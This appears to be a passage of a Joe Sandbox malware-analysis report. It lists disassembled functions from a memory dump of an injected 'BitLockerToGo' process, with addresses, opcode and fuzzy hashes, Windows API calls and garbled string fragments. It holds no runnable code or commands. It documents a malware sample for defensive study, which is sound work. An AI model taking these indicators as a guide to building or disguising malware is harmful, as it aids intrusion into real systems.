Instruction ID: e08e89583ff41bb63186691aaff37d3da50b1ebbe3f7a05c8c95fbd0d8cea314
Opcode Fuzzy Hash: 870bc07dd9d9c2729cfb418612b6e843b9b4e11582466316892b811d99b10a67
Instruction Fuzzy Hash: 2AC17071504B418FD725CF3AC4607A3FBE1AF96318F18886EC4EB87692D779A406CB51

Function 0052CD3E Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

X'e%, xrefs: 0052CD86
$#, xrefs: 0052CD8E

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $#$X'e%
API String ID: 0-1943142432
Opcode ID: 3baca3a6ed2a59091d26102f99078b1b36034460c75a3ab585604bc8cec7301b
Instruction ID: 344ac6efccbf5d77cb141430f426f7e4c40931c91165bbe72cb07e11ea253ff3
Opcode Fuzzy Hash: 3baca3a6ed2a59091d26102f99078b1b36034460c75a3ab585604bc8cec7301b
Instruction Fuzzy Hash: D45115756083418BC7158F28C8917AFBFF2EFD6354F088A2CE5958B3A1D7798409DB52

Function 00528FD0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 005291F9

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: aeb085e3b6b32cf0ea233b20fc7eaf2b4f21b50dc35b70ca0548eae202b04405
Instruction ID: 233416da215d54cd3ec86978b5f757a488c3f8d65568fdb425a11bc14bded964
Opcode Fuzzy Hash: aeb085e3b6b32cf0ea233b20fc7eaf2b4f21b50dc35b70ca0548eae202b04405
Instruction Fuzzy Hash: E9510773F547290BC30CAEADDC96359BAD76BC8610F0E853DA884DB391E9B89C0586C1

Function 0053453C Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b45bff83e430d12c01ea0736672ef4725da4d90e2f71695d9a9abdb9e1626c
Instruction ID: dc896209c3621dafaf05bbd30620dfec5ac892468eb9422702510da77724f157
Opcode Fuzzy Hash: 42b45bff83e430d12c01ea0736672ef4725da4d90e2f71695d9a9abdb9e1626c
Instruction Fuzzy Hash: 6A51AEB2904B418FC734CF28C895663BBE1BF5A304F188A6DD5EA8B652E734F905CB50

Function 0055CCE0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

"!"#, xrefs: 0055CE95, 0055CF16

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: "!"#
API String ID: 2994545307-388342572
Opcode ID: b0fc96ee28873245f6c35de1ee4442dea7daf4a6d8e311abd50086a455d6efb1
Instruction ID: 53e1cb3f7405387063e257d6072f2c1b8fd5d92eeeb38e76318f0590260986f9
Opcode Fuzzy Hash: b0fc96ee28873245f6c35de1ee4442dea7daf4a6d8e311abd50086a455d6efb1
Instruction Fuzzy Hash: 4D811472A083119FC7298F14D8A062BBFE2FBD5315F15852DED8597251DB71AC48C782

Function 00558160 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0055BC1B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0055818E

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0052D768 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

sw, xrefs: 0052D768

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: sw
API String ID: 0-2343230549
Opcode ID: 96f2594cd4338d7fe4b640ccea48ec2c404a40182b15f3b8038ecba8dbb9ddb7
Instruction ID: dad21b6e41e54c0ce850d1641ffde68a5dc0951fde42d8e09b0511728f053949
Opcode Fuzzy Hash: 96f2594cd4338d7fe4b640ccea48ec2c404a40182b15f3b8038ecba8dbb9ddb7
Instruction Fuzzy Hash: 60512775A087A106D724B7246C1A7EF7E99AFD2318F05093CE449673C2EB256606C2D7

Function 005553B0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 752c91ab4cf9655f81fd553a9420a4af839e72b950d81b9ea4f4854f9136b0fb
Instruction ID: cf13b61c5fe6706fee2da81cf014cdb6353e209b42c82d95e3ed07de9d0dc486
Opcode Fuzzy Hash: 752c91ab4cf9655f81fd553a9420a4af839e72b950d81b9ea4f4854f9136b0fb
Instruction Fuzzy Hash: 23617C72A05B108FC7248F28D87973BBB92BBD0716F5A852DDCC55B251F671AC088781

Function 00552880 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5627420c8c0b042f9a6d9d766bf0d92e7a3e9464c12d1c2708532a4d61de8023
Instruction ID: 3b491890813856a655025a5ed7ad86506a43026aafec4d60f8536f2b6436db7e
Opcode Fuzzy Hash: 5627420c8c0b042f9a6d9d766bf0d92e7a3e9464c12d1c2708532a4d61de8023
Instruction Fuzzy Hash: 7D5126217092019BD3108BA8CC5073BBBE6FBD6711F18CA2EE880A7391C3B49C499792

Function 0053B390 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2914d14d39b537099086cb69a720f92e15a3b2c27c77ec0a035921e04bf88952
Instruction ID: 50c18c4f4e975e879f84b438cafc1c1171c203efd6ba0f485d9f3edbe86d8eb1
Opcode Fuzzy Hash: 2914d14d39b537099086cb69a720f92e15a3b2c27c77ec0a035921e04bf88952
Instruction Fuzzy Hash: D921B0A15182118BE710DB28C82277BBBF5FF96364F195E18E4C5CB291F7788904C7A6

Function 00558B37 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 926f35936852d8ba302a598f40432002dbcad272fac95e339c7a7266fd374cf6
Instruction ID: fdb1da5beb85b81733bd625522eb941b26eb2e008214a9d3270e1656bc01b8ca
Opcode Fuzzy Hash: 926f35936852d8ba302a598f40432002dbcad272fac95e339c7a7266fd374cf6
Instruction Fuzzy Hash: D421D274A41204AFDB10CF18CDA1B7EBBB6FB95711F345214E8017B391CBB5AD068BA4

Function 0054954C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00549592

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c806161b7f97d131083ccb04c036e34ca8b5772039e82b765d938486c9d59181
Instruction ID: 8e62f933aeff9e4c9315462ce2ebe1ca03470f669a5bc0794d67d4604e36b81d
Opcode Fuzzy Hash: c806161b7f97d131083ccb04c036e34ca8b5772039e82b765d938486c9d59181
Instruction Fuzzy Hash: BCF0B7B41087019FD314DF28D5A871ABBF0FF89304F10880CE4968B3A0DBB5AA48DF82

Function 0054ACE7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0054AD2E

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 76f759d3f1155a3297437a5892021e98177c2f72f93ea462e1ec60302a3a606c
Instruction ID: 897f68e8d1ac277bbc3caaf587d0badb45683b7a4b00077b4c0e0f41570b54ed
Opcode Fuzzy Hash: 76f759d3f1155a3297437a5892021e98177c2f72f93ea462e1ec60302a3a606c
Instruction Fuzzy Hash: B1F067B45083418FD325DF28C5A875ABBE5BB84308F00891CE5958B790D7BA9A4CCF82

Function 0052D0C3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0052D0D5

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 58a1e194c26f846bd6e2584c38aa93f9a369a7a1cf74fa5268a5ea8cee53d9d2
Instruction ID: 6e2f21afff0cdc41f9e881a3dfe41c23ff8ecc98c178ab0b95713e3c16ac281a
Opcode Fuzzy Hash: 58a1e194c26f846bd6e2584c38aa93f9a369a7a1cf74fa5268a5ea8cee53d9d2
Instruction Fuzzy Hash: A9E017367D47006BF7284A18DC13F5022125795B62F398218F311FE7D8C8F8A10A5508

Function 005552E2 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 005552E8

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 646a959a3715bd2e8f1eb24634e769d223a5b1e0041762d908c1457cf22cdee3
Instruction ID: 08a19fbf995e178e6b0f562f7b3d3078b712a1e0198246e8ac2f01cde7581e7c
Opcode Fuzzy Hash: 646a959a3715bd2e8f1eb24634e769d223a5b1e0041762d908c1457cf22cdee3
Instruction Fuzzy Hash: CDB09230244200DFEA484B01EC04B20372DBB6A201F201008E509871E2C6B29C4AFA00

Function 0052D090 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0052D0A3

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 180e9aa8ad10ac2ebeca84f7904f1413e64ff0b527f0b51a1a49ce5a45c91c54
Instruction ID: 31c7c4626ff8f87d1fc20a6cff9ea1135efc061b761a9d4ede9e9c7498224987
Opcode Fuzzy Hash: 180e9aa8ad10ac2ebeca84f7904f1413e64ff0b527f0b51a1a49ce5a45c91c54
Instruction Fuzzy Hash: F1D0A735155644B7D204A7ADDC1BFB23A6C8302755F040219F2A2C72D1FD506918E56D

Function 00558102 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00558109

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2841f1108766d9766e62e022ae2b5523a7493c935c4860155b980d75d3650959
Instruction ID: 77db52b35c5b45690c68f44f21d7d8439296d3d781bb60e7991022255420ebfa
Opcode Fuzzy Hash: 2841f1108766d9766e62e022ae2b5523a7493c935c4860155b980d75d3650959
Instruction Fuzzy Hash: 51C09B72641010A7D5541647BC09B757F58D790267F301072FB09940D1D652595FF6A0

Function 00555392 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00555396

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 39b9435a616127427739fd507baae7c12d32d7199d88bbae2f43057c3082f146
Instruction ID: de55a7433d1454a76a91034adca960470c3dec6797cd5d1d2665e4638c53dc61
Opcode Fuzzy Hash: 39b9435a616127427739fd507baae7c12d32d7199d88bbae2f43057c3082f146
Instruction Fuzzy Hash: 54A022B00A0200ABF0A0232A3C0AFA3330C8B0020AF000000FF08A80C2E022A8E822B8

Non-executed Functions

Function 0052B3A0 Relevance: 22.9, Strings: 18, Instructions: 431COMMON

Download Yara Rule

Strings

I)^+, xrefs: 0052B4B0
M%E', xrefs: 0052B4A8
6E+G, xrefs: 0052B4E8
P!N#, xrefs: 0052B4A0
>M"O, xrefs: 0052B4F8
Z@ZV, xrefs: 0052B76D
jabc, xrefs: 0052B520
eI?K, xrefs: 0052B4F0
, xrefs: 0052B3BE
5Q<S, xrefs: 0052B500
<Y?[, xrefs: 0052B510
O9M;, xrefs: 0052B4D0
&A-C, xrefs: 0052B4E0
ntir, xrefs: 0052B795
E-A/, xrefs: 0052B4B8
8]S_, xrefs: 0052B518
7U9W, xrefs: 0052B508
(), xrefs: 0052B599

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $&A-C$()$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$Z@ZV$eI?K$jabc$ntir
API String ID: 0-1601616414
Opcode ID: da3b5171d51605ab5ca9c023518dfe9d9b3c3d684025354ebabfe76276f5c63f
Instruction ID: 34af2a2dcbfcb0afa68f8d0d8e006cbd0e75c480571ade771612a012b9a3e185
Opcode Fuzzy Hash: da3b5171d51605ab5ca9c023518dfe9d9b3c3d684025354ebabfe76276f5c63f
Instruction Fuzzy Hash: 77D1D4726083654BE724CF25A4A126FBFE2EFD2714F1DC96CD4D94B391C73588068B82

Function 00538670 Relevance: 12.3, Strings: 9, Instructions: 1078COMMON

Download Yara Rule

Strings

KM[p, xrefs: 005389A2
ElN~, xrefs: 005389C8
)84:, xrefs: 00538DEF
E~Eq, xrefs: 005389A9
u\XZ, xrefs: 00538A40
l`kc, xrefs: 0053897F
iaQQ, xrefs: 0053898D
x`{l, xrefs: 005389F0
;, xrefs: 00538823

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )84:$ElN~$E~Eq$KM[p$iaQQ$l`kc$u\XZ$x`{l$;
API String ID: 0-639049957
Opcode ID: 1e2bdf1050f80ada65f8fad9c504f63fe708f856b25a02980850cfb77a4f0cec
Instruction ID: cd731c1c1fb35ff016532b913f984fde7b9f7086d23b690f94e09c0207d0fdbb
Opcode Fuzzy Hash: 1e2bdf1050f80ada65f8fad9c504f63fe708f856b25a02980850cfb77a4f0cec
Instruction Fuzzy Hash: 5482E474604B418FC739CF29C490666BFE2BF95310F188A6DE4E68BB92DB75E805CB50

Function 00529720 Relevance: 9.0, Strings: 7, Instructions: 283COMMON

Download Yara Rule

Strings

{OuH, xrefs: 0052982F
d`Rb, xrefs: 00529847
2, xrefs: 005298B7
EGG@, xrefs: 00529827
r)B}, xrefs: 005297C2
z)B}, xrefs: 00529755
#%, xrefs: 00529738

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #%$2$EGG@$d`Rb$r)B}$z)B}${OuH
API String ID: 0-3036209920
Opcode ID: 31fa2ffa98e869c13ab6ba37216e30c1a016197edbcff0a4ab10a838fcf6e7c9
Instruction ID: 73ca9e5eb33d86f0aa1fe828effcebb4b64f167811b5276868c67acb083cae11
Opcode Fuzzy Hash: 31fa2ffa98e869c13ab6ba37216e30c1a016197edbcff0a4ab10a838fcf6e7c9
Instruction Fuzzy Hash: 6381D17110C3968BD3158F2A94A03ABFFE1AFE3344F28499DE4D55B382D7758909C752

Function 0055A320 Relevance: 8.0, Strings: 6, Instructions: 546COMMON

Download Yara Rule

Strings

U, xrefs: 0055A61A
U, xrefs: 0055A615
%&' , xrefs: 0055A8E0
dejk, xrefs: 0055A9B0
InA>, xrefs: 0055A950
, xrefs: 0055A720

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $%&' $InA>$dejk$U$U
API String ID: 0-283223120
Opcode ID: 71c0e6c87417854c6ad764e0e43c49f6017ba8a3a04a91a18840044ca15b6a5e
Instruction ID: 32f802b01e92d1233efcd476a27a941f2755a4c859647618839a377bc036edca
Opcode Fuzzy Hash: 71c0e6c87417854c6ad764e0e43c49f6017ba8a3a04a91a18840044ca15b6a5e
Instruction Fuzzy Hash: 7212B3716083518FD319CE28C89176FBBE2FBC5314F15CA2DE8A69B391D7758849CB82

Function 0052B98C Relevance: 7.6, Strings: 6, Instructions: 102COMMON

Download Yara Rule

Strings

9i7g, xrefs: 0052BB31
-e0c, xrefs: 0052BB3B
}#{, xrefs: 0052BAFF
a-e+, xrefs: 0052BA87
k%h#, xrefs: 0052BA9B
c)t', xrefs: 0052BA91

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -e0c$9i7g$a-e+$c)t'$k%h#$}#{
API String ID: 0-851799077
Opcode ID: 46abaadfebe3f66b8e31ed6cb8c850a5c917109b0d11606ad32a139b08e4c181
Instruction ID: 324f2d4c342bfae0f018725ba5f2c68ef04713c4d6fb17794b42fa956850a79f
Opcode Fuzzy Hash: 46abaadfebe3f66b8e31ed6cb8c850a5c917109b0d11606ad32a139b08e4c181
Instruction Fuzzy Hash: 7251DBB0542B419FE360CF22E881B96BBE2BB86740F548E1CC6EA5B704DB74A145CF84

Function 00556090 Relevance: 5.7, Strings: 4, Instructions: 690COMMON

Download Yara Rule

Strings

InA>, xrefs: 00556160
f, xrefs: 005562D9
%&' , xrefs: 0055613C
InA>, xrefs: 00556470

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&' $InA>$InA>$f
API String ID: 2994545307-2101634708
Opcode ID: 124f371c44e566fa4a868f6a7b5ce46125010ee4f50b44c53bc7507846ced51b
Instruction ID: b8d3932d0dd2dad9c68f71cd90253ba4264e42df87d82ddb7b707afab0d56d04
Opcode Fuzzy Hash: 124f371c44e566fa4a868f6a7b5ce46125010ee4f50b44c53bc7507846ced51b
Instruction Fuzzy Hash: 0832B3756093818FC714CF68C8A472BBBE2BFD8315F588A2EE89587395D771D809CB42

Function 0053C6E0 Relevance: 5.4, Strings: 4, Instructions: 435COMMON

Download Yara Rule

Strings

z)B}, xrefs: 0053C8B3
|}bc, xrefs: 0053C917
r)B}, xrefs: 0053C8F6
HI, xrefs: 0053C70C

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: HI$r)B}$z)B}$|}bc
API String ID: 0-1054524823
Opcode ID: 7d070a09d2d39ba504d6da603881b6721edc27aaccf0a383d5852eb7ae3c13fd
Instruction ID: 2bb14b7c9b0a6a6c5c3da36ce7193d0769005537219f25ce5e4bb7f897392874
Opcode Fuzzy Hash: 7d070a09d2d39ba504d6da603881b6721edc27aaccf0a383d5852eb7ae3c13fd
Instruction Fuzzy Hash: E9B104729083519BD7209F24C88277BBFE1FF92354F19882CE8C5AB281E735ED458792

Function 00559A30 Relevance: 2.8, Strings: 2, Instructions: 338COMMON

Download Yara Rule

Strings

%&' , xrefs: 00559A60
%&' , xrefs: 00559C30

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&' $%&'
API String ID: 2994545307-1644610688
Opcode ID: af657d3a9c10bf97d008dbc8f3de232af6b1c926729a0020e0578425d83b8e89
Instruction ID: 3a5234fc569dbb91ea9e66fbcb868c1a96d7d093178a491ffe51b144f475a07b
Opcode Fuzzy Hash: af657d3a9c10bf97d008dbc8f3de232af6b1c926729a0020e0578425d83b8e89
Instruction Fuzzy Hash: 29A10571A09301DBD724CB25CCA1B7BBBE2FBC5311F44892EE88587251EB349908CB92

Function 00537437 Relevance: 2.8, Strings: 2, Instructions: 321COMMON

Download Yara Rule

Strings

07, xrefs: 005374D1
yK, xrefs: 0053748B

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 07$yK
API String ID: 0-1808118969
Opcode ID: a1463e0b3e37160c021b306d5532d1ff53a4c6a30392c61a5ed4e86bfa9b9d46
Instruction ID: 1426932b570ddce0a7583bf7ae75a973c8430937d821aef3a2ee32985ef8e34b
Opcode Fuzzy Hash: a1463e0b3e37160c021b306d5532d1ff53a4c6a30392c61a5ed4e86bfa9b9d46
Instruction Fuzzy Hash: 419158B2E05619CBD724CFA8C8927AABB72FFE5320F19C128D8555B390E7789D05C790

Function 00542350 Relevance: 2.7, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

Q_, xrefs: 005424D4
uQRS, xrefs: 0054237A

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: uQRS$Q_
API String ID: 0-1742114800
Opcode ID: 1e681597edd27c4464353dc5238ac65d9a6eaf0914d20f89837cdcc948eadc0e
Instruction ID: 8f8752c58f66f1cf4ecb25f6591653773df6c61063db8e4fe72227324b7fe786
Opcode Fuzzy Hash: 1e681597edd27c4464353dc5238ac65d9a6eaf0914d20f89837cdcc948eadc0e
Instruction Fuzzy Hash: 4281E0716083658FD714CF28D89075FBBE5EBD5704F04892CE5A5AB281DBB0D90A8B82

Function 005441E0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 005444C8

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: c755d4f713ad3602ffffc0475aab78991e63c86cfe085f248ae130e693da2ce6
Instruction ID: 27b4f488833b3196e2604eb17c8d74cefbdfc1e5a10d60f5afb10d88c6be8c6d
Opcode Fuzzy Hash: c755d4f713ad3602ffffc0475aab78991e63c86cfe085f248ae130e693da2ce6
